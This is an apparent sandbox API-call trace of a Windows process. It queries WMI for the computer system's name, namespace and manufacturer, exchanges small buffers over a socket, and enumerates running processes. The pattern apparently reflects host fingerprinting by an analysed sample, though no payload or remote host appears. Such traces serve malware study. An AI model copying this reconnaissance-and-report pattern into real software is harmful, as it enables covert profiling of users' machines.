	[0201.861] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__GENUS", lFlags=0, pVal=0x1c68cc30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cc2c*=0, plFlavor=0x1c68cc28*=0 | out: pVal=0x1c68cc30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cc2c*=3, plFlavor=0x1c68cc28*=64) returned 0x0
	[0201.861] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__PATH", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68cbcc*=8, plFlavor=0x1c68cbc8*=64) returned 0x0
	[0201.861] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0201.861] CoGetObjectContext (in: riid=0x1c68cb68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb60 | out: ppv=0x1c68cb60*=0x221868) returned 0x0
	[0201.861] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cb80 | out: pAptType=0x1c68cb80*=1) returned 0x0
	[0201.861] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cc88 | out: ppvObject=0x1c68cc88*=0x0) returned 0x80004002
	[0201.861] IUnknown:Release (This=0x221868) returned 0x1
	[0201.862] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c1f0 | out: ppv=0x1c68c1f0*=0x1cc31c20) returned 0x0
	[0201.862] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31c20, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf00 | out: ppvObject=0x1c68bf00*=0x0) returned 0x80004002
	[0201.862] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31c20, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bee8 | out: ppvObject=0x1c68bee8*=0x1cc405f0) returned 0x0
	[0201.863] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc405f0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bdf0 | out: ppvObject=0x1c68bdf0*=0x1cc405f0) returned 0x0
	[0201.863] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc405f0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68be70 | out: ppvObject=0x1c68be70*=0x0) returned 0x80004002
	[0201.864] WbemDefPath:IUnknown:AddRef (This=0x1cc405f0) returned 0x3
	[0201.864] CoGetContextToken (in: pToken=0x1c68bac0 | out: pToken=0x1c68bac0) returned 0x0
	[0201.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc405f0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ba80 | out: ppvObject=0x1c68ba80*=0x1b87f3a0) returned 0x0
	[0201.864] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b87f3a0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bab0 | out: pCid=0x1c68bab0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.864] WbemDefPath:IUnknown:Release (This=0x1b87f3a0) returned 0x3
	[0201.864] CoGetContextToken (in: pToken=0x1c68ba90 | out: pToken=0x1c68ba90) returned 0x0
	[0201.864] WbemDefPath:IUnknown:AddRef (This=0x1cc405f0) returned 0x4
	[0201.864] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc405f0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bba8 | out: ppvObject=0x1c68bba8*=0x0) returned 0x80004002
	[0201.865] WbemDefPath:IUnknown:Release (This=0x1cc405f0) returned 0x3
	[0201.865] WbemDefPath:IUnknown:Release (This=0x1cc405f0) returned 0x2
	[0201.865] WbemDefPath:IUnknown:Release (This=0x1cc31c20) returned 0x0
	[0201.865] WbemDefPath:IUnknown:Release (This=0x1cc405f0) returned 0x1
	[0201.865] CoGetContextToken (in: pToken=0x1c68c7c0 | out: pToken=0x1c68c7c0) returned 0x0
	[0201.865] CoGetContextToken (in: pToken=0x1c68c700 | out: pToken=0x1c68c700) returned 0x0
	[0201.865] WbemDefPath:IUnknown:AddRef (This=0x1cc405f0) returned 0x2
	[0201.865] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc405f0, riid=0x1c68c840*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c820 | out: ppvObject=0x1c68c820*=0x1cc405f0) returned 0x0
	[0201.866] WbemDefPath:IUnknown:Release (This=0x1cc405f0) returned 0x2
	[0201.866] WbemDefPath:IUnknown:Release (This=0x1cc405f0) returned 0x1
	[0201.866] CoGetContextToken (in: pToken=0x1c68c940 | out: pToken=0x1c68c940) returned 0x0
	[0201.866] CoGetContextToken (in: pToken=0x1c68c880 | out: pToken=0x1c68c880) returned 0x0
	[0201.866] WbemDefPath:IUnknown:AddRef (This=0x1cc405f0) returned 0x2
	[0201.866] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc405f0, riid=0x1c68c9c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9a0 | out: ppvObject=0x1c68c9a0*=0x1cc405f0) returned 0x0
	[0201.866] WbemDefPath:IUnknown:Release (This=0x1cc405f0) returned 0x2
	[0201.866] WbemDefPath:IUnknown:AddRef (This=0x1cc405f0) returned 0x3
	[0201.866] WbemDefPath:IWbemPath:SetText (This=0x1cc405f0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0201.866] WbemDefPath:IUnknown:Release (This=0x1cc405f0) returned 0x2
	[0201.867] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cc00 | out: puCount=0x1c68cc00*=0x2) returned 0x0
	[0201.867] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cc00*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc00*=0x17, pszText=0x0) returned 0x0
	[0201.867] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cc00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.867] CoTaskMemAlloc (cb=0x8) returned 0x1b88a2f0
	[0201.867] IEnumWbemClassObject:Next (in: This=0x1cc3ddb8, lTimeout=-1, uCount=0x1, apObjects=0x1b88a2f0, puReturned=0x1c68ccb8 | out: apObjects=0x1b88a2f0*=0x0, puReturned=0x1c68ccb8*=0x0) returned 0x1
	[0201.868] CoTaskMemFree (pv=0x1b88a2f0) 
	[0201.868] CoGetContextToken (in: pToken=0x1c68ca40 | out: pToken=0x1c68ca40) returned 0x0
	[0201.868] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x1
	[0201.868] IUnknown:Release (This=0x1cc3ddb8) returned 0x0
	[0201.869] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0201.869] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0201.869] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.870] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0201.870] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0201.870] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0201.870] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0201.870] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0201.870] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0201.870] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.870] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__CLASS", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0201.870] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.870] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__CLASS", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0201.870] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.871] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0201.871] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0201.871] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.871] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0201.871] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0201.871] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.871] IWbemClassObject:GetNames (in: This=0x1cc3de20, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c68cce8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c68cce0 | out: pNames=0x1c68cce0*="\x01ƀ\x08") returned 0x0
	[0201.871] SafeArrayGetDim (psa=0x1b88b590) returned 0x1
	[0201.872] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__GENUS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.872] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__CLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.872] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.872] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.872] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__DYNASTY", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.872] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0201.872] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__RELPATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.872] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0201.872] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.873] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__DERIVATION", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b88b590*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b88a2e0, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c68ccdc*=8200, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.873] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__SERVER", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.873] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0201.873] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.873] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0201.874] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="__PATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0201.874] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0201.874] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cd80 | out: puCount=0x1c68cd80*=0x2) returned 0x0
	[0201.874] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd80*=0x17, pszText=0x0) returned 0x0
	[0201.874] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.874] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="Manufacturer", lFlags=0, pVal=0x1c68cd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd6c*=0, plFlavor=0x1c68cd68*=0 | out: pVal=0x1c68cd70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x1c68cd6c*=8, plFlavor=0x1c68cd68*=32) returned 0x0
	[0201.874] SysStringLen (param_1="CLEVO") returned 0x5
	[0201.874] IWbemClassObject:Get (in: This=0x1cc3de20, wszName="Manufacturer", lFlags=0, pVal=0x1c68cfa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cf9c*=8, plFlavor=0x1c68cf98*=32 | out: pVal=0x1c68cfa0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x1c68cf9c*=8, plFlavor=0x1c68cf98*=32) returned 0x0
	[0201.874] SysStringLen (param_1="CLEVO") returned 0x5
	[0201.875] send (s=0x408, buf=0x2fc6c48*, len=32, flags=0) returned 32
	[0201.876] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 90
	[0202.071] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0202.326] send (s=0x408, buf=0x2fef848*, len=27, flags=0) returned 27
	[0202.327] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 122
	[0202.643] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0202.648] CoTaskMemAlloc (cb=0x104) returned 0x1b87d890
	[0202.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87d890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.649] CoTaskMemFree (pv=0x1b87d890) 
	[0203.804] EnumProcesses (in: lpidProcess=0x301e958, cb=0x400, lpcbNeeded=0x1c68caf0 | out: lpidProcess=0x301e958, lpcbNeeded=0x1c68caf0) returned 1
	[0203.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c110e8, Length=0x20000, ResultLength=0x1c68ca10 | out: SystemInformation=0x12c110e8, ResultLength=0x1c68ca10*=0x140e0) returned 0x0
	[0210.617] send (s=0x408, buf=0x30b1c20*, len=24, flags=0) returned 24
	[0210.617] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 199
	[0210.625] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0211.094] CoGetObjectContext (in: riid=0x1c68cbb8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cbb0 | out: ppv=0x1c68cbb0*=0x221868) returned 0x0
	[0211.094] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cbd0 | out: pAptType=0x1c68cbd0*=1) returned 0x0
	[0211.094] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68ccd8 | out: ppvObject=0x1c68ccd8*=0x0) returned 0x80004002
	[0211.094] IUnknown:Release (This=0x221868) returned 0x1
	[0211.095] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c240 | out: ppv=0x1c68c240*=0x1cc31d00) returned 0x0
	[0211.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31d00, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf50 | out: ppvObject=0x1c68bf50*=0x0) returned 0x80004002
	[0211.096] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31d00, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf38 | out: ppvObject=0x1c68bf38*=0x1cc3dcd0) returned 0x0
	[0211.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3dcd0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68be40 | out: ppvObject=0x1c68be40*=0x1cc3dcd0) returned 0x0
	[0211.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3dcd0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68bec0 | out: ppvObject=0x1c68bec0*=0x0) returned 0x80004002
	[0211.097] WbemDefPath:IUnknown:AddRef (This=0x1cc3dcd0) returned 0x3
	[0211.097] CoGetContextToken (in: pToken=0x1c68bb10 | out: pToken=0x1c68bb10) returned 0x0
